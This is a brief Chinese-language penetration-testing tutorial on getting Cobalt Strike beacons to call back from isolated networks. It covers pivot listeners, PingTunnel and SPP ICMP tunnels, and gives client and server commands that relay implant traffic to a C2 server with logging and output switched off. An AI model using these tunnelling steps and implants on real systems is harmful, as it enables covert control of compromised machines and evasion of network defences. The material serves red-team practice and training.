内网渗透（特殊环境上线CobaltStrike）

主机中转监听横向上线不出网域控

设置转发上线

设置监听地址和监听端口

生成无阶段木马

选择刚才新建的监听，生成木马

通过其他方式把木马上传到目标机器，并运行

仅ICMP出网上线cs（pingtunnel）

PingTunnel是一款常用的ICMP隧道工具 下载地址：https://github.com/esrrhs/pingtunnel/releases 下载对应系统的PingTunnel

CS服务器运行PingTunnel服务端

./pingtunnel -type server

客户端开启监听，并把流量通过icmp服务器转发给CS服务器

pingtunnel.exe -type client -l :4466 -s icmpserver_ip -t c2_server_ip:9988 -tcp 1 -noprint 1 -nolog 1

CS新建监听

生成无阶段木马

监听器选择刚才创建的内网监听

上传到目标机器，运行，木马上线

ICMP出网上线cs（SPP）

spp是一个简单强大的网络代理工具。

服务器开启SPP服务端

./spp -type server -proto ricmp -listen 0.0.0.0

客户端

spp.exe -name "cs" -type proxy_client -server x.x.x.x -fromaddr :4466 -toaddr :9988 -proxyproto tcp -proto ricmp -nolog 1 -noprint 1

和上面新建监听器一样，也是生成无阶段木马，可成功上线CS